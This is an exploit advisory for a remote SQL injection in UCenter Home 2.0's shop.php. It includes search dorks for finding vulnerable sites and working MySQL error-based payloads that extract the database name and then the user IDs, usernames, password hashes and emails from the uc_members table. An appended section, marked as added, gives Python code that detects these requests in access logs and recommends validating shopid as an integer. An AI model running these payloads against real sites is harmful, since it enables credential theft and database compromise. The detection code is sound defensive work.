__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

value's : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
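
Detection side of the request pattern above, added here as an example and not part of the original advisory: it scans access-log lines for `shop.php?ac=view` requests whose `shopid` is not a plain integer and tags the error-based markers that appear in the advisory's strings. The combined log format, the marker names and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-format access-log line (assumed log format).
REQ = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Markers of MySQL error-based extraction, taken from the strings in the advisory.
MARKERS = {
    "dup_key_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "info_schema": re.compile(r"information_schema", re.I),
    "hex_literal": re.compile(r"0x[0-9a-f]{2,}", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
}

def inspect(line):
    """Return a finding dict for a suspicious shop.php request, else None."""
    m = REQ.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    if not parts.path.lower().endswith("/shop.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if qs.get("ac", [""])[0] != "view" or "shopid" not in qs:
        return None
    shopid = "&".join(qs["shopid"])  # join repeats so a second shopid= cannot hide
    if re.fullmatch(r"\d{1,10}", shopid):
        return None  # a plain integer is the only legitimate shape
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(shopid))
    severe = "dup_key_rand" in hits or len(hits) >= 2
    return {"ip": m["ip"], "status": int(m["status"]), "markers": hits,
            "severity": "high" if severe else "review", "shopid": shopid[:80]}

def scan(lines):
    return [f for f in map(inspect, lines) if f]

# Constructed sample lines (documentation IPs, not real traffic).
SAMPLE = [
    '198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201'
    '%20from(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 612',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12%27 HTTP/1.1" 200 300',
    '198.51.100.4 - - [01/Jan/2024:10:00:11 +0000] "GET /index.php?page=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

The same integer-only rule is the fix on the server side: cast or validate `shopid` as an integer before it reaches the query, or bind it as a parameter.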